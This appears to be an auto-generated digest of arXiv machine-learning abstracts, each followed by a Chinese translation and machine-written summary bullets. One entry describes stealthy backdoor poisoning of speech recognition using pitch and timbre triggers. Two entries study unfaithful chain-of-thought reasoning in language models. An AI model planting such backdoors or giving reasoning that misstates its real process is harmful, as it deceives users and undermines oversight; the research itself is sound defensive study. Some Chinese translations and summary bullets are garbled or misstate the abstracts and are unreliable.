    Abstract Fairness-aware machine learning has attracted a surge of attention in many domains, such as online advertising, personalized recommendation, and social media analysis in web applications. Fairness-aware machine learning aims to eliminate biases of learning models against certain subgroups described by certain protected (sensitive) attributes such as race, gender, and age. Among many existing fairness notions, counterfactual fairness is a popular notion defined from a causal perspective. It measures the fairness of a predictor by comparing the prediction of each individual in the original world and that in the counterfactual worlds in which the value of the sensitive attribute is modified. A prerequisite for existing methods to achieve counterfactual fairness is the prior human knowledge of the causal model for the data. However, in real-world scenarios, the underlying causal model is often unknown, and acquiring such human knowledge could be very difficult. In these scenarios, it is risky to directly trust the causal models obtained from information sources with unknown reliability and even causal discovery methods, as incorrect causal models can consequently bring biases to the predictor and lead to unfair predictions. In this work, we address the problem of counterfactually fair prediction from observational data without given causal models by proposing a novel framework CLAIRE. Specifically, under certain general assumptions, CLAIRE effectively mitigates the biases from the sensitive attribute with a representation learning framework based on counterfactual data augmentation and an invariant penalty. Experiments conducted on both synthetic and real-world datasets validate the superiority of CLAIRE in both counterfactual fairness and prediction performance.
    摘要 “对待公平机器学习在多个领域中引起了广泛关注,例如在网络广告、个人化推荐和社交媒体分析中的网络应用程序。对待公平机器学习的目标是删除机器学习模型对某些子群体(敏感特征)的偏袋,例如性别、年龄和种族。许多现有的公平定义中,Counterfactual fairness是一种受欢迎的定义,它从 causal 的角度定义了公平的定义。Counterfactual fairness 的定义是根据每个个体在原始世界中的预测和在替代世界中的预测来衡量模型的公平。现有的方法以前需要人类对敏感特征的 causal 模型有充分的知识。但在实际情况下,背景 causal 模型通常是未知的,获取这种人类知识可能是很困难的。在这些情况下,直接对这些信息来源不确定的 causal 模型进行信任可能是很危险的。在这个工作中,我们解决了从观察数据中进行 counterfactually 公平预测的问题,不需要人类对敏感特征的 causal 模型的知识。我们提出了一个名为 CLAIRE 的新框架,它在满足一些一般假设下,可以对敏感特征进行优化,并且使用 counterfactual 数据增强和不变 penalty 来减少偏袋。实验结果显示,CLAIRE 在 counterfactual 公平和预测性能方面具有优越性。”

Can Euclidean Symmetry be Leveraged in Reinforcement Learning and Planning?

  • paper_url: http://arxiv.org/abs/2307.08226
  • repo_url: None
  • paper_authors: Linfeng Zhao, Owen Howell, Jung Yeon Park, Xupeng Zhu, Robin Walters, Lawson L. S. Wong
  • for: 这个论文的目的是设计改进的学习算法,用于控制和规划任务,具有欧几何群同质性。
  • methods: 论文使用了一种统一优化算法,可以应用于离散和连续的 symmetry 问题,包括优化算法和样本生成算法。
  • results: 实验证明,通过具有欧几何群同质性的算法,可以更好地解决自然的控制问题。
    Abstract In robotic tasks, changes in reference frames typically do not influence the underlying physical properties of the system, which has been known as invariance of physical laws.These changes, which preserve distance, encompass isometric transformations such as translations, rotations, and reflections, collectively known as the Euclidean group. In this work, we delve into the design of improved learning algorithms for reinforcement learning and planning tasks that possess Euclidean group symmetry. We put forth a theory on that unify prior work on discrete and continuous symmetry in reinforcement learning, planning, and optimal control. Algorithm side, we further extend the 2D path planning with value-based planning to continuous MDPs and propose a pipeline for constructing equivariant sampling-based planning algorithms. Our work is substantiated with empirical evidence and illustrated through examples that explain the benefits of equivariance to Euclidean symmetry in tackling natural control problems.
    摘要 在机器人任务中,参照系统的变化通常不会影响系统的物理性质,这被称为不变性法律。这些变化包括同构射影、旋转和反射,合称为欧几何群。在这个工作中,我们深入探讨改进学习算法的设计,以便在奖励学习和规划任务中具有欧几何群的对称性。我们提出了对往年的绝对同构和连续同构在奖励学习、规划和最优控制中的统一理论。算法方面,我们进一步扩展了二维路径规划,并提出了一个管道的构建同构抽样计划算法。我们的工作得到了实验证明,并通过例子解释了在自然控制问题中如何通过对维持欧几何群的同构性来获得利益。

A Lightweight Framework for High-Quality Code Generation

  • paper_url: http://arxiv.org/abs/2307.08220
  • repo_url: None
  • paper_authors: Mohammed Latif Siddiq, Beatrice Casey, Joanna C. S. Santos
  • for: This paper aims to improve the quality and security of automatically generated source codes using transformer-based code generation models.
  • methods: The proposed framework, FRANC, includes a static filter and a quality-aware ranker to sort code snippets based on compilability and quality scores. Prompt engineering is also used to fix persistent quality issues.
  • results: FRANC improves the compilability of Java and Python code suggestions by 9% to 46% and 10% to 43%, respectively. The average improvement in NDCG@10 score is 0.0763, and the repairing techniques repair the highest 80% of prompts. The framework takes approximately 1.98 seconds for Java and 0.08 seconds for Python.
    Abstract In recent years, the use of automated source code generation utilizing transformer-based generative models has expanded, and these models can generate functional code according to the requirements of the developers. However, recent research revealed that these automatically generated source codes can contain vulnerabilities and other quality issues. Despite researchers' and practitioners' attempts to enhance code generation models, retraining and fine-tuning large language models is time-consuming and resource-intensive. Thus, we describe FRANC, a lightweight framework for recommending more secure and high-quality source code derived from transformer-based code generation models. FRANC includes a static filter to make the generated code compilable with heuristics and a quality-aware ranker to sort the code snippets based on a quality score. Moreover, the framework uses prompt engineering to fix persistent quality issues. We evaluated the framework with five Python and Java code generation models and six prompt datasets, including a newly created one in this work (SOEval). The static filter improves 9% to 46% Java suggestions and 10% to 43% Python suggestions regarding compilability. The average improvement over the NDCG@10 score for the ranking system is 0.0763, and the repairing techniques repair the highest 80% of prompts. FRANC takes, on average, 1.98 seconds for Java; for Python, it takes 0.08 seconds.
    摘要 近年来,利用基于 Transformer 的生成模型自动生成源代码的应用日益广泛,这些模型可以根据开发者的需求生成功能代码。然而,最新的研究发现,这些自动生成的代码可能含有漏洞和其他质量问题。尽管研究人员和实践者一直在尝试改进代码生成模型,但重新训练和微调大型语言模型既耗时又耗费资源。为此,我们提出了轻量级框架 FRANC,用于从基于 Transformer 的代码生成模型中推荐更安全、更高质量的源代码。FRANC 包括一个静态筛选器,借助启发式规则保证生成代码可编译;以及一个质量感知排序器,根据质量分数对代码片段进行排序。此外,框架还利用提示工程来修复持续存在的质量问题。我们在五个 Python 和 Java 代码生成模型以及六个提示数据集(包括本工作新构建的 SOEval)上评估了该框架。静态筛选器使 Java 建议的可编译率提升 9% 到 46%,Python 建议的可编译率提升 10% 到 43%;排序系统在 NDCG@10 指标上的平均提升为 0.0763,修复技术最多可修复 80% 的提示。FRANC 处理 Java 平均耗时 1.98 秒,Python 平均耗时 0.08 秒。
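
A sketch in the spirit of FRANC's pipeline (not its actual implementation): a static filter that keeps only snippets that compile as Python, and a toy quality-aware ranker; the scoring heuristic here is purely hypothetical.

```python
suggestions = [
    "def add(a, b):\n    return a + b\n",
    "def add(a, b)\n    return a + b\n",          # syntax error: filtered out
    "def add(a, b):\n    \"\"\"Add two numbers.\"\"\"\n    return a + b\n",
]

def compiles(snippet: str) -> bool:
    try:
        compile(snippet, "<suggestion>", "exec")   # static check: does it parse/compile?
        return True
    except SyntaxError:
        return False

def quality_score(snippet: str) -> float:
    # Hypothetical heuristic: reward docstrings, lightly penalize length.
    return (1.0 if '"""' in snippet else 0.0) - 0.01 * len(snippet)

ranked = sorted(filter(compiles, suggestions), key=quality_score, reverse=True)
for i, s in enumerate(ranked, 1):
    print(f"--- rank {i} ---\n{s}")
```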

Forward Laplacian: A New Computational Framework for Neural Network-based Variational Monte Carlo

  • paper_url: http://arxiv.org/abs/2307.08214
  • repo_url: None
  • paper_authors: Ruichen Li, Haotian Ye, Du Jiang, Xuelan Wen, Chuwei Wang, Zhe Li, Xiang Li, Di He, Ji Chen, Weiluo Ren, Liwei Wang
  • for: 能够扩展NN-VMC的应用范围到更大的系统,包括更多的原子、分子和化学反应。
  • methods: 使用了一种新的计算框架 named Forward Laplacian,通过高效的前进传播过程计算了神经网络中的 Laplacian,从而大幅提高了NN-VMC的计算效率。
  • results: 对于一系列的原子、分子和化学反应,NN-VMC通过Empirical数据示出了可以解决通用量子力学问题的潜力。
    Abstract Neural network-based variational Monte Carlo (NN-VMC) has emerged as a promising cutting-edge technique of ab initio quantum chemistry. However, the high computational cost of existing approaches hinders their applications in realistic chemistry problems. Here, we report the development of a new NN-VMC method that achieves a remarkable speed-up by more than one order of magnitude, thereby greatly extending the applicability of NN-VMC to larger systems. Our key design is a novel computational framework named Forward Laplacian, which computes the Laplacian associated with neural networks, the bottleneck of NN-VMC, through an efficient forward propagation process. We then demonstrate that Forward Laplacian is not only versatile but also facilitates more developments of acceleration methods across various aspects, including optimization for sparse derivative matrix and efficient neural network design. Empirically, our approach enables NN-VMC to investigate a broader range of atoms, molecules and chemical reactions for the first time, providing valuable references to other ab initio methods. The results demonstrate a great potential in applying deep learning methods to solve general quantum mechanical problems.
    摘要 基于神经网络的变分蒙特卡洛(NN-VMC)已成为从头算量子化学中一项前沿技术,但现有方法高昂的计算代价限制了其在实际化学问题中的应用。本文提出了一种新的 NN-VMC 方法,其速度提升超过一个数量级,从而大幅扩展了 NN-VMC 可处理体系的规模。其核心是名为 Forward Laplacian 的新计算框架:它通过一次高效的前向传播过程计算神经网络对应的拉普拉斯算子——这正是 NN-VMC 的计算瓶颈。我们还展示了 Forward Laplacian 的通用性,它为稀疏导数矩阵优化、高效网络设计等多方面的加速方法提供了便利。实验上,该方法首次使 NN-VMC 能够研究更大范围的原子、分子和化学反应,为其他从头算方法提供了有价值的参照,显示出用深度学习方法求解一般量子力学问题的巨大潜力。
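
An educational sketch of the forward-Laplacian idea (not the paper's implementation): for a small tanh MLP, propagate the value, Jacobian, and Laplacian with respect to the input in a single forward pass, and compare against a finite-difference check. The network sizes and weights below are arbitrary.

```python
import numpy as np

rng = np.random.default_rng(0)
dims = [3, 16, 16, 1]
weights = [rng.normal(scale=0.5, size=(dims[i + 1], dims[i])) for i in range(3)]
biases = [rng.normal(scale=0.1, size=dims[i + 1]) for i in range(3)]

def forward_laplacian(x):
    f = x                                  # value, shape (d,)
    J = np.eye(len(x))                     # Jacobian w.r.t. the input
    L = np.zeros(len(x))                   # Laplacian of each coordinate
    for i, (W, b) in enumerate(zip(weights, biases)):
        f, J, L = W @ f + b, W @ J, W @ L  # an affine layer acts linearly on (f, J, L)
        if i < len(weights) - 1:           # tanh on hidden layers
            s = np.tanh(f)
            d1, d2 = 1 - s ** 2, -2 * s * (1 - s ** 2)   # tanh', tanh''
            L = d2 * (J ** 2).sum(axis=1) + d1 * L       # chain rule for the Laplacian
            J = d1[:, None] * J
            f = s
    return f, J, L

x = rng.normal(size=3)
f, J, L = forward_laplacian(x)

# Finite-difference check on the scalar output.
def net(x):
    return forward_laplacian(x)[0][0]
eps, fd_lap = 1e-4, 0.0
for i in range(3):
    e = np.zeros(3); e[i] = eps
    fd_lap += (net(x + e) - 2 * net(x) + net(x - e)) / eps ** 2
print("forward Laplacian:", L[0], " finite difference:", fd_lap)
```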

Towards Stealthy Backdoor Attacks against Speech Recognition via Elements of Sound

  • paper_url: http://arxiv.org/abs/2307.08208
  • repo_url: https://github.com/hanbocai/badspeech_soe
  • paper_authors: Hanbo Cai, Pengcheng Zhang, Hai Dong, Yan Xiao, Stefanos Koffas, Yiming Li
  • for: 这个论文的目的是研究潜在攻击者可以通过恶意投入到语音识别模型的训练过程中,使模型具有恶意预测行为的问题。
  • methods: 这篇论文使用了一些新的攻击方法,包括使用高频谱的尖声作为触发器,并将其与其他音频 clip 混合以实现更隐蔽的攻击。它们还使用了timbre特征来实现隐蔽的攻击。
  • results: 实验结果表明,这些攻击方法可以在不同的设定下(例如,all-to-one、all-to-all、干净标签、物理和多个攻击点设定)下实现高效的攻击。这些攻击方法也比较隐蔽,可以逃脱检测。
    Abstract Deep neural networks (DNNs) have been widely and successfully adopted and deployed in various applications of speech recognition. Recently, a few works revealed that these models are vulnerable to backdoor attacks, where the adversaries can implant malicious prediction behaviors into victim models by poisoning their training process. In this paper, we revisit poison-only backdoor attacks against speech recognition. We reveal that existing methods are not stealthy since their trigger patterns are perceptible to humans or machine detection. This limitation is mostly because their trigger patterns are simple noises or separable and distinctive clips. Motivated by these findings, we propose to exploit elements of sound ($e.g.$, pitch and timbre) to design more stealthy yet effective poison-only backdoor attacks. Specifically, we insert a short-duration high-pitched signal as the trigger and increase the pitch of remaining audio clips to `mask' it for designing stealthy pitch-based triggers. We manipulate timbre features of victim audios to design the stealthy timbre-based attack and design a voiceprint selection module to facilitate the multi-backdoor attack. Our attacks can generate more `natural' poisoned samples and therefore are more stealthy. Extensive experiments are conducted on benchmark datasets, which verify the effectiveness of our attacks under different settings ($e.g.$, all-to-one, all-to-all, clean-label, physical, and multi-backdoor settings) and their stealthiness. The code for reproducing main experiments are available at \url{https://github.com/HanboCai/BadSpeech_SoE}.
    摘要 深度神经网络(DNNs)已在语音识别的各类应用中被广泛采用和部署。近期一些研究表明,这些模型容易受到后门攻击:攻击者可以通过污染训练过程,向受害模型植入恶意的预测行为。在本文中,我们重新审视了针对语音识别的仅投毒(poison-only)后门攻击。我们发现,现有方法并不隐蔽,其触发模式容易被人耳或机器检测到,这主要是因为这些触发模式通常是简单的噪声,或是可分离、特征明显的音频片段。受此启发,我们提出利用声音要素(如音高和音色)来设计更隐蔽且依然有效的仅投毒后门攻击。具体而言,我们插入一段短促的高音信号作为触发器,并提高其余音频片段的音高来"掩盖"它,从而构造隐蔽的基于音高的触发器;我们还通过操纵受害音频的音色特征来设计隐蔽的基于音色的攻击,并设计了一个声纹选择模块以支持多后门攻击。我们的攻击能够生成更"自然"的中毒样本,因此更加隐蔽。我们在基准数据集上进行了大量实验,验证了这些攻击在不同设置(如 all-to-one、all-to-all、干净标签、物理及多后门设置)下的有效性与隐蔽性。复现主要实验的代码见 \url{https://github.com/HanboCai/BadSpeech_SoE}。
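
An illustrative sketch of a pitch-based trigger (not the paper's exact recipe, and without the pitch-raising "masking" step): mix a short high-pitched tone into the beginning of an audio clip at low amplitude to produce a poisoned training sample. The sample rate, frequency, and amplitudes are assumptions for the example.

```python
import numpy as np

def add_pitch_trigger(audio: np.ndarray, sr: int = 16000,
                      freq: float = 7000.0, dur: float = 0.05,
                      amplitude: float = 0.02) -> np.ndarray:
    n = min(int(sr * dur), len(audio))
    t = np.arange(n) / sr
    trigger = amplitude * np.sin(2 * np.pi * freq * t)     # short high-pitched tone
    poisoned = audio.copy()
    poisoned[:n] += trigger                                 # overlay at the beginning
    return np.clip(poisoned, -1.0, 1.0)

sr = 16000
clean = 0.1 * np.random.default_rng(0).standard_normal(sr)  # 1 s of stand-in audio
poisoned = add_pitch_trigger(clean, sr)
print("max sample change:", float(np.abs(poisoned - clean).max()))
```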

A Quantum Convolutional Neural Network Approach for Object Detection and Classification

  • paper_url: http://arxiv.org/abs/2307.08204
  • repo_url: None
  • paper_authors: Gowri Namratha Meedinti, Kandukuri Sai Srirekha, Radhakrishnan Delhibabu
  • for: 这篇论文主要评估量子卷积神经网络(QCNN)的潜在能力,与经典卷积神经网络(CNN)和人工神经网络(ANN)模型进行比较。
  • methods: 本论文使用了量子计算方法,将数据存储在量子环境中,并应用了CNN结构来处理这些数据。
  • results: 分析结果表明,QCNNs在某些应用场景下可以超越经典CNN和ANN模型,both in terms of accuracy and efficiency。此外,QCNNs还可以处理更大的复杂性水平。
    Abstract This paper presents a comprehensive evaluation of the potential of Quantum Convolutional Neural Networks (QCNNs) in comparison to classical Convolutional Neural Networks (CNNs) and Artificial / Classical Neural Network (ANN) models. With the increasing amount of data, utilizing computing methods like CNN in real-time has become challenging. QCNNs overcome this challenge by utilizing qubits to represent data in a quantum environment and applying CNN structures to quantum computers. The time and accuracy of QCNNs are compared with classical CNNs and ANN models under different conditions such as batch size and input size. The maximum complexity level that QCNNs can handle in terms of these parameters is also investigated. The analysis shows that QCNNs have the potential to outperform both classical CNNs and ANN models in terms of accuracy and efficiency for certain applications, demonstrating their promise as a powerful tool in the field of machine learning.
    摘要 这篇论文对量子卷积神经网络(QCNN)与经典卷积神经网络(CNN)以及人工/经典神经网络(ANN)模型进行了全面的评估。随着数据量不断增加,实时使用 CNN 等计算方法变得越来越困难。QCNN 通过利用量子比特在量子环境中表示数据,并在量子计算机上应用 CNN 结构来应对这一挑战。本文在不同的批大小和输入规模等条件下,比较了 QCNN 与经典 CNN、ANN 模型的时间和准确率,并考察了 QCNN 在这些参数下所能处理的最大复杂度。分析结果表明,在某些应用中,QCNN 在准确率和效率上均有潜力超越经典 CNN 和 ANN 模型,显示出其作为机器学习领域强大工具的前景。

Noise removal methods on ambulatory EEG: A Survey

  • paper_url: http://arxiv.org/abs/2308.02437
  • repo_url: None
  • paper_authors: Sarthak Johari, Gowri Namratha Meedinti, Radhakrishnan Delhibabu, Deepak Joshi
  • for: 本研究旨在实时处理患者短访EEG数据,以提高医疗干预的精确性和效率。
  • methods: 本研究使用了许多检测和移除噪声的技术,包括模式识别、机器学习、和信号处理等。
  • results: 本研究发现,不同条件下的EEG数据可以使用不同的检测和移除噪声技术,以提高医疗干预的精确性和效率。
    Abstract Over many decades, research has been devoted to removing noise from ambulatory EEG. An enormous number of research papers has been published on noise identification and removal, and it is difficult to present a detailed review of all of this literature. Therefore, in this paper, an attempt has been made to review the detection and removal of noise in ambulatory EEG. More than 100 research papers are discussed to discern the techniques for detecting and removing noise from ambulatory EEG recordings. The literature survey further shows that the pattern recognition required to detect ambulatory activity, such as eye opening and closing, varies with the conditions under which the EEG datasets were acquired. This is mainly because EEG recorded under different conditions has different characteristics, which in turn necessitates identifying pattern recognition techniques that can effectively distinguish EEG noise from EEG data recorded under various conditions.
    摘要 数十年来,研究者一直致力于去除动态脑电图(ambulatory EEG)中的噪声,相关论文数量庞大,难以逐一详细综述。本文尝试对噪声的检测与去除方法进行回顾,讨论了100余篇研究论文中用于检测和去除动态脑电噪声的技术。文献调研还表明,检测动态活动(如睁眼与闭眼)所需的模式识别方法随脑电数据采集条件的不同而变化,这主要是因为不同条件下采集的脑电信号具有不同的特性,因此需要找到能够在各种条件下有效区分脑电噪声与脑电数据的模式识别技术。

HOPE: High-order Polynomial Expansion of Black-box Neural Networks

  • paper_url: http://arxiv.org/abs/2307.08192
  • repo_url: https://github.com/harrypotterxtx/hope
  • paper_authors: Tingxiong Xiao, Weihang Zhang, Yuxiao Cheng, Jinli Suo
  • for: 这篇论文旨在提供一种方法,使深度神经网络变得更加可解,以便在需要作出有理的决策的领域中应用。
  • methods: 这篇论文使用了高阶多项式扩展(High-order Polynomial Expansion,HOPE)方法,将神经网络拓展成高阶多项式的参考输入。特别是,authors derive了高阶DERIVATIVE规则 для复杂函数,并将其扩展到神经网络,以快速和准确地计算神经网络的高阶DERIVATIVE。
  • results: 数值分析表明,提案的方法具有高精度、低计算复杂度和良好的收敛性。此外,authors还用HOPE方法实现了深度学习中的功能发现、快速推理和特征选择等广泛应用。
    Abstract Despite their remarkable performance, deep neural networks remain mostly ``black boxes'', suggesting inexplicability and hindering their wide applications in fields requiring making rational decisions. Here we introduce HOPE (High-order Polynomial Expansion), a method for expanding a network into a high-order Taylor polynomial on a reference input. Specifically, we derive the high-order derivative rule for composite functions and extend the rule to neural networks to obtain their high-order derivatives quickly and accurately. From these derivatives, we can then derive the Taylor polynomial of the neural network, which provides an explicit expression of the network's local interpretations. Numerical analysis confirms the high accuracy, low computational complexity, and good convergence of the proposed method. Moreover, we demonstrate HOPE's wide applications built on deep learning, including function discovery, fast inference, and feature selection. The code is available at https://github.com/HarryPotterXTX/HOPE.git.
    摘要 尽管表现出色,深度神经网络在很大程度上仍是"黑盒子",缺乏可解释性,这限制了它们在需要做出合理决策的领域中的广泛应用。我们在此提出 HOPE(高阶多项式扩展)方法,它可以将神经网络在参考输入处展开为高阶泰勒多项式。具体而言,我们推导了复合函数的高阶导数规则,并将其推广到神经网络,从而快速且精确地计算神经网络的高阶导数;基于这些导数即可得到神经网络的泰勒多项式,为网络的局部行为提供显式的解释表达式。数值分析验证了该方法的高精度、低计算复杂度和良好的收敛性。此外,我们还展示了 HOPE 在深度学习中的广泛应用,包括函数发现、快速推理和特征选择。代码见 https://github.com/HarryPotterXTX/HOPE.git。
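
A hedged 1-D illustration of the underlying idea: expand a scalar network around a reference input into a Taylor polynomial. Here the derivatives are obtained by repeated autograd rather than the paper's dedicated high-order derivative rules, and the tiny network is only a stand-in.

```python
import math
import torch
import torch.nn as nn

net = nn.Sequential(nn.Linear(1, 16), nn.Tanh(), nn.Linear(16, 1))
x0 = torch.tensor([[0.3]], requires_grad=True)

# Collect f(x0), f'(x0)/1!, ..., f^(K)(x0)/K! as Taylor coefficients.
order = 4
deriv = net(x0).sum()
coeffs = [deriv.item()]
for k in range(1, order + 1):
    deriv = torch.autograd.grad(deriv, x0, create_graph=True)[0].sum()
    coeffs.append(deriv.item() / math.factorial(k))

def taylor(x):
    return sum(c * (x - x0.item()) ** k for k, c in enumerate(coeffs))

x = 0.35
exact = net(torch.tensor([[x]])).item()
print(f"network: {exact:.5f}  taylor expansion: {taylor(x):.5f}")
```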

Mini-Giants: “Small” Language Models and Open Source Win-Win

  • paper_url: http://arxiv.org/abs/2307.08189
  • repo_url: None
  • paper_authors: Zhengping Zhou, Lezhi Li, Xinxi Chen, Andy Li
  • for: 这篇论文主要是为了讨论小语言模型的发展和应用。
  • methods: 论文使用了开源社区和小语言模型来实现技术、伦理和社会上的赢利。
  • results: 论文提出了小语言模型在实际应用场景中的需求和潜力,并进行了对小语言模型的比较研究和评估方法。
    Abstract ChatGPT is phenomenal. However, it is prohibitively expensive to train and refine such giant models. Fortunately, small language models are flourishing and becoming more and more competent. We call them "mini-giants". We argue that open source community like Kaggle and mini-giants will win-win in many ways, technically, ethically and socially. In this article, we present a brief yet rich background, discuss how to attain small language models, present a comparative study of small language models and a brief discussion of evaluation methods, discuss the application scenarios where small language models are most needed in the real world, and conclude with discussion and outlook.
    摘要 ChatGPT 的表现十分惊艳,但训练和打磨这样的巨型模型代价高昂。幸运的是,小语言模型正在蓬勃发展,能力日益增强,我们称之为"小巨人"。我们认为,Kaggle 等开源社区与小巨人将在技术、伦理和社会等多个层面实现共赢。在本文中,我们首先给出简短而充实的背景介绍,讨论如何获得小语言模型,给出小语言模型的对比研究并简要讨论评估方法,介绍现实世界中最需要小语言模型的应用场景,最后以讨论和展望作结。

An Empirical Investigation of Pre-trained Model Selection for Out-of-Distribution Generalization and Calibration

  • paper_url: http://arxiv.org/abs/2307.08187
  • repo_url: None
  • paper_authors: Hiroki Naganuma, Ryuichiro Hataya
  • for: 提高out-of-distribution泛化性能和推理不确定性
  • methods: investigate pre-trained model selection的影响,并比较不同的数据集和模型参数对性能指标的影响
  • results: 发现预训练模型选择对out-of-distribution泛化性能有显著影响,大型模型表现较好,但需要进一步研究memorization和真正的泛化之间的平衡。
    Abstract In the realm of out-of-distribution generalization tasks, finetuning has risen as a key strategy. While the most focus has been on optimizing learning algorithms, our research highlights the influence of pre-trained model selection in finetuning on out-of-distribution performance and inference uncertainty. Balancing model size constraints of a single GPU, we examined the impact of varying pre-trained datasets and model parameters on performance metrics like accuracy and expected calibration error. Our findings underscore the significant influence of pre-trained model selection, showing marked performance improvements over algorithm choice. Larger models outperformed others, though the balance between memorization and true generalization merits further investigation. Ultimately, our research emphasizes the importance of pre-trained model selection for enhancing out-of-distribution generalization.
    摘要 在异常分布泛化任务中, fine-tuning 已成为一项关键策略。而我们的研究表明,预训练模型选择在 fine-tuning 中对异常分布性能和推理不确定性产生了重要影响。我们在单个 GPU 的模型大小限制下对不同的预训练数据集和模型参数进行了研究,发现预训练模型选择对性能指标如准确率和预期抽象误差产生了显著的影响。大型模型表现更好,但是要找到Memorization 和真正的泛化之间的平衡仍然需要进一步的调查。最终,我们的研究强调了预训练模型选择对异常分布泛化的重要性。
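
One of the metrics compared in this study is expected calibration error (ECE); the sketch below computes it from synthetic confidences and correctness labels to make the definition concrete.

```python
import numpy as np

def expected_calibration_error(confidences, correct, n_bins=10):
    bins = np.linspace(0.0, 1.0, n_bins + 1)
    ece = 0.0
    for lo, hi in zip(bins[:-1], bins[1:]):
        mask = (confidences > lo) & (confidences <= hi)
        if mask.any():
            # Gap between average accuracy and average confidence in this bin,
            # weighted by the fraction of samples falling into the bin.
            gap = abs(correct[mask].mean() - confidences[mask].mean())
            ece += mask.mean() * gap
    return ece

rng = np.random.default_rng(0)
conf = rng.uniform(0.5, 1.0, 5000)
correct = rng.random(5000) < conf * 0.9          # an over-confident model
print(f"ECE = {expected_calibration_error(conf, correct):.3f}")
```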

Measuring Faithfulness in Chain-of-Thought Reasoning

  • paper_url: http://arxiv.org/abs/2307.13702
  • repo_url: None
  • paper_authors: Tamera Lanham, Anna Chen, Ansh Radhakrishnan, Benoit Steiner, Carson Denison, Danny Hernandez, Dustin Li, Esin Durmus, Evan Hubinger, Jackson Kernion, Kamilė Lukošiūtė, Karina Nguyen, Newton Cheng, Nicholas Joseph, Nicholas Schiefer, Oliver Rausch, Robin Larson, Sam McCandlish, Sandipan Kundu, Saurav Kadavath, Shannon Yang, Thomas Henighan, Timothy Maxwell, Timothy Telleen-Lawton, Tristan Hume, Zac Hatfield-Dodds, Jared Kaplan, Jan Brauner, Samuel R. Bowman, Ethan Perez
  • for: investigate how Chain-of-Thought (CoT) reasoning may be unfaithful in large language models (LLMs)
  • methods: examine how model predictions change when intervening on the CoT (e.g., adding mistakes or paraphrasing)
  • results: CoT’s performance boost is not due to added test-time compute or information encoded in the CoT’s phrasing, and models produce less faithful reasoning as they become larger and more capable.
    Abstract Large language models (LLMs) perform better when they produce step-by-step, "Chain-of-Thought" (CoT) reasoning before answering a question, but it is unclear if the stated reasoning is a faithful explanation of the model's actual reasoning (i.e., its process for answering the question). We investigate hypotheses for how CoT reasoning may be unfaithful, by examining how the model predictions change when we intervene on the CoT (e.g., by adding mistakes or paraphrasing it). Models show large variation across tasks in how strongly they condition on the CoT when predicting their answer, sometimes relying heavily on the CoT and other times primarily ignoring it. CoT's performance boost does not seem to come from CoT's added test-time compute alone or from information encoded via the particular phrasing of the CoT. As models become larger and more capable, they produce less faithful reasoning on most tasks we study. Overall, our results suggest that CoT can be faithful if the circumstances such as the model size and task are carefully chosen.
    摘要 大型语言模型(LLM)在回答问题前先给出分步的"思维链"(CoT)推理时表现更好,但所陈述的推理是否忠实地反映模型实际的推理过程(即其得出答案的过程)尚不清楚。我们通过对 CoT 进行干预(例如加入错误或改写),观察模型预测如何变化,以检验 CoT 推理可能不忠实的各种假设。在不同任务上,模型在预测答案时对 CoT 的依赖程度差异很大:有时高度依赖 CoT,有时则基本忽略它。CoT 带来的性能提升似乎既不只是来自额外的测试时计算,也不是来自 CoT 特定措辞中编码的信息。随着模型变得更大、更强,它们在我们研究的多数任务上给出的推理反而更不忠实。总体而言,我们的结果表明,只要审慎选择模型规模和任务等条件,CoT 可以是忠实的。
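
A minimal sketch of the kind of intervention described above: corrupt an early step of the sampled chain-of-thought and check whether the final answer moves. The `llm` helper is a placeholder, not a real API; in practice it would wrap calls to the model being evaluated.

```python
# Hypothetical helper: stands in for a call to the language model under study.
def llm(prompt: str) -> str:
    return "(model output would appear here)"

question = "Q: A train travels 60 km in 1.5 hours. What is its average speed?"
cot = llm(question + "\nLet's think step by step.")

# Intervention: inject a mistake into an early reasoning step, then let the model
# continue from the corrupted chain and produce its final answer.
corrupted_cot = cot.replace("60 km", "80 km", 1)   # example perturbation

answer_original  = llm(question + "\n" + cot + "\nTherefore, the answer is")
answer_corrupted = llm(question + "\n" + corrupted_cot + "\nTherefore, the answer is")

# If the final answer is insensitive to the corrupted chain, the stated reasoning
# is unlikely to be a faithful description of how the answer was produced.
print("answer changed after intervention:", answer_original != answer_corrupted)
```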

Question Decomposition Improves the Faithfulness of Model-Generated Reasoning

  • paper_url: http://arxiv.org/abs/2307.11768
  • repo_url: https://github.com/anthropics/decompositionfaithfulnesspaper
  • paper_authors: Ansh Radhakrishnan, Karina Nguyen, Anna Chen, Carol Chen, Carson Denison, Danny Hernandez, Esin Durmus, Evan Hubinger, Jackson Kernion, Kamilė Lukošiūtė, Newton Cheng, Nicholas Joseph, Nicholas Schiefer, Oliver Rausch, Sam McCandlish, Sheer El Showk, Tamera Lanham, Tim Maxwell, Venkatesa Chandrasekaran, Zac Hatfield-Dodds, Jared Kaplan, Jan Brauner, Samuel R. Bowman, Ethan Perez
  • for: 帮助验证大型自然语言模型(LLM)的正确性和安全性。
  • methods: 使用基于分解的方法,即将问题拆分为多个子问题,让模型在相互独立的上下文中回答更简单的子问题,以提高模型生成推理的忠实性。
  • results: 研究表明,基于分解的方法能够提高模型生成推理的忠实性,同时不会牺牲太多性能;这些方法有助于我们验证 LLM 行为的正确性和安全性。
    Abstract As large language models (LLMs) perform more difficult tasks, it becomes harder to verify the correctness and safety of their behavior. One approach to help with this issue is to prompt LLMs to externalize their reasoning, e.g., by having them generate step-by-step reasoning as they answer a question (Chain-of-Thought; CoT). The reasoning may enable us to check the process that models use to perform tasks. However, this approach relies on the stated reasoning faithfully reflecting the model's actual reasoning, which is not always the case. To improve over the faithfulness of CoT reasoning, we have models generate reasoning by decomposing questions into subquestions. Decomposition-based methods achieve strong performance on question-answering tasks, sometimes approaching that of CoT while improving the faithfulness of the model's stated reasoning on several recently-proposed metrics. By forcing the model to answer simpler subquestions in separate contexts, we greatly increase the faithfulness of model-generated reasoning over CoT, while still achieving some of the performance gains of CoT. Our results show it is possible to improve the faithfulness of model-generated reasoning; continued improvements may lead to reasoning that enables us to verify the correctness and safety of LLM behavior.
